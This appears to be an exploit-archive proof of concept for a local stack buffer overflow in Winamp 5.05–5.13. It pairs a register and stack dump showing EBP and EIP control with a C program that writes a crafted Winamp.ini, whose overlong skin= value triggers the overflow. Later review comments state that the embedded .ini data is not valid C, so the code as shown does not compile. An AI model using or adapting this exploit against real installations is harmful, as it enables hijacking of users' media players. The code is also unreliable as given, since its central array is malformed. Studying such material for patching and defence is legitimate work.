Winamp versions 5.05 through 5.13 .ini local stack buffer overflow proof of concept exploit.
e5862cc513ec580a652b913188b7b7c0f4287a97d191bfbe1ada137d8251baf2
/*Winamp 5.05-5.13 .ini local stack buffer overflow poc
The problem is in the skin field: when a long string is
written there it causes the buffer overflow.
All you have to do is replace the original file with this one.
-snipp--
[Winamp]
visplugin_name=vis_avs.dll
visplugin_num=0
mw_open=1
outname=out_ds.dll
proxyonly80=0
Proxy=
inet_mode=0
langpack=
skin=long string
-snipp--
Registers
EAX 001E0A17
ECX 00008E3E
EDX 7C90EB94 ntdll.KiFastSystemCallRet
EBX 004C0304 winamp.004C0304
ESP 0012965C ASCII "edit.txt"
EBP 41414141 ->controlled
ESI 77D5355A USER32.GetSubMenu
EDI 00009D85
EIP 6C705C41
Stack:
0012914A 41414141
0012914E 41414141
00129152 41414141
00129156 41414141
0012915A 41414141
0012915E 41414141
00129162 41414141
....................
77F30A7A 5D POP EBP
77F30A7B C3 RETN
"\x7A\x0A\xF3\x77"
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define Fil3 "Winamp.ini"
/*
 * Contents of the Winamp.ini file that fmake() writes out.
 *
 * NOTE(review): as written this is not a valid C initializer. The lines
 * between the braces are bare text rather than string literals, so the
 * translation unit does not compile. For a char array each line would
 * have to be a quoted literal ending in "\n", and the backslashes in the
 * cwd= and config_waveoutdir= values would need escaping. fmake() below
 * also refers to this array as `Data`; C is case-sensitive, so that name
 * is undeclared.
 *
 * The overlong skin= value is the one line that differs from an ordinary
 * key=value settings dump; it is the input the header comment describes
 * as overflowing the stack buffer.
 */
char data[]=
{
[Winamp]
visplugin_name=vis_avs.dll
visplugin_num=0
mw_open=1
outname=out_ds.dll
proxyonly80=0
Proxy=
inet_mode=0
langpack=
/* overlong skin= value: the trigger described in the header comment */
skin=AAAAAAAAAAAAAAAAAAAABBBBBBBBBBrQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2dREbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoaMeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxSnqPTGfRyilOYGxlSXPtLJboH8S4kwIgTxSl1C00GOzOLMrbAyfKUUT2222Rblsaqv6UpdvNIsNr
defext=mp3
titlefmt=[%artist% - ]$if2(%title%,$filepart(%filename%))
dspplugin_name=
check_ft_startup=1
pe_fontsize=11
visplugin_priority=2
visplugin_autoexec=0
dspplugin_num=0
sticon=0
splash=0
taskbar=0
dropaotfs=1
ascb_new=1
ttips=1
riol=0
minst=0
whichicon=1
whichicon2=1
addtolist=0
snap=1
snaplen=10
parent=1
hilite=1
disvis=1
rofiob=0
shownumsinpl=1
keeponscreen=1
eqdsize=1
usecursors=1
fixtitles=3
priority=1
shuffle_morph_rate=50
useexttitles=1
bifont=0
ospb=0
embedwnd_freesize=0
no_visseh=0
newverchk=11413
newverchk2=0
last_shortdesc=
last_shorturl=
prefs_last_page=552
autoload_eq=0
use_eq=1
eq_ws=0
wx=26
wy=29
minimized=0
aot=0
shuffle=0
repeat=1
volume=82
pan=0
easymove=1
dsize=0
timeleftmode=0
autoscrollname=1
sa=1
safire=4
saref=2
safalloff=2
sa_peaks=1
sa_peak_falloff=1
eq_wx=26
eq_wy=145
eq_open=1
pe_wx=26
pe_wy=261
pe_open=1
pe_width=275
pe_height=145
pe_height_ws=
mb_wx=301
mb_wy=29
mb_open=0
mb_width=350
mb_height=348
video_wx=26
video_wy=145
video_open=0
video_width=275
video_height=232
video_ratio1=4
video_ratio2=3
video_useratio=0
windowshade=0
preamp=31
pilp=0
randskin=0
cwd=G:\Program Files\Winamp
pladv=1
eq_data=32,22,31,41,40,31,19,16,16,17
video_vsync=0
video_aspectadj=1
video_overlays=1
video_ddraw=1
video_updsize=1
video_autoopen=1
video_autoclose=1
video_noss=1
video_osd=1
video_yv12=1
video_stopclose=1
video_remove_fs_on_stop=0
wav_do_header=1
wav_convert=0
wav_ext=WAV
playlist_custom_font=Arial
custom_plfont=0
[WAV Writing Output Driver]
config_waveoutdir=c:\
cfg_cvt=
cfg_wav1=
cfg_wav1p=c:\out.wav
cfg_mode=
cfg_thread=
cfg_killsilence=
cfg_wfx_s=18
cfg_wfx=0100020044AC000010B10200040010000000CA
cfg_wfx1=0100020044AC000010B10200040010000000CA
[gen_ff]
classicplws=0
classicplwidth=275
classicplheight=145
classicmw=1
classiceq=1
[out_ds]
cfg_total_time=54A15F08000000005C
[AVS]
smp=0
smp_mt=2
wx=32
wy=32
ww=300
wh=232
config_pres_subdir=
cfg_docked=0
cfg_cfgwnd_open=0
cfg_cfgwnd_x=50
cfg_cfgwnd_y=50
cfg_fs_w=0
cfg_fs_h=0
cfg_fs_d=2
cfg_fs_bpp=0
cfg_fs_fps=6
cfg_fs_rnd=1
cfg_fs_rnd_time=10
cfg_fs_dblclk=1
cfg_fs_flip=0
cfg_fs_height=80
cfg_fs_use_overlay=0
cfg_fs_cancelondeactivate=1
cfg_speed=5
cfg_trans=0
cfg_dont_min_avs=0
cfg_smartbeat=0
cfg_smartbeatsticky=1
cfg_smartbeatresetnewsong=1
cfg_smartbeatonlysticky=0
cfg_transitions_en=4
cfg_transitions_preinit=36
cfg_transitions_speed=8
cfg_transitions_mode=32769
cfg_bkgnd_render=0
cfg_bkgnd_render_color=2031631
cfg_render_prio=0
g_preset_dirty=0
cfg_prompt_save_preset=1
last_preset_name=
cfg_reuseonresize=1
cfg_log_errors=0
cfg_reset_vars=1
cfg_seh=1
debugreg_0=0
debugreg_1=1
debugreg_2=2
debugreg_3=3
debugreg_4=4
debugreg_5=5
debugreg_6=6
debugreg_7=7
};
/* Banner that main() prints before the .ini file is generated. */
char header[] =
    "*******************************************************\n"
    " Winamp 5.05-5.13 .ini local stack buffer overflow poc\n"
    " by fl0 fl0w \n"
    "*******************************************************\n";
/*----------prototypes---------*/
/* Write the embedded .ini contents to the file named fname; returns 0 on success. */
int fmake(char *fname);
/* Print msg to stdout as a "[*]"-tagged status line. */
void print(char *msg);
/*-----main-----------*/
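/*
 * Entry point: print the banner, generate the .ini file, then wait for a
 * keypress so a console window opened for the program stays visible.
 *
 * Returns EXIT_SUCCESS when fmake() reports success, EXIT_FAILURE
 * otherwise; the original discarded fmake()'s return value.
 */
int main(void)
{
    int rc = EXIT_SUCCESS;

    printf("%s", header);
    if (fmake(Fil3) != 0) {
        rc = EXIT_FAILURE;
    }
    /* Deliberate pause; the key read is not used. */
    getchar();
    return rc;
}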
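/*
 * Write the embedded .ini contents (the file-scope array `data`) to fname.
 *
 * fname: path of the file to create; an existing file is truncated.
 * Returns 0 on success and -1 when the file cannot be opened, written or
 * closed; print() reports the outcome on stdout in every case.
 *
 * Fixes relative to the original: the array was referenced as `Data`
 * (undeclared — C is case-sensitive); free() was called on an array with
 * static storage duration, which is undefined behaviour; exit(0) on an
 * open failure reported success to the caller; and write/close errors
 * were never checked, so a short or unflushed write went unnoticed.
 */
int fmake(char *fname)
{
    FILE *f = fopen(fname, "wb");
    if (f == NULL) {
        print("File error");
        return -1;
    }
    /* fputs() writes the bytes as-is; data is content, not a format string. */
    if (fputs(data, f) == EOF) {
        print("Write error");
        fclose(f);
        return -1;
    }
    /* fclose() flushes buffered output; a failure here means the file may be incomplete. */
    if (fclose(f) != 0) {
        print("Close error");
        return -1;
    }
    print("Winamp.ini file Done!");
    return 0;
}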
/*
 * Print msg to stdout on its own line, prefixed with "[*]" and preceded
 * by a blank line.
 */
void print(char *msg)
{
    fputs("\n[*]", stdout);
    printf("%s\n", msg);
}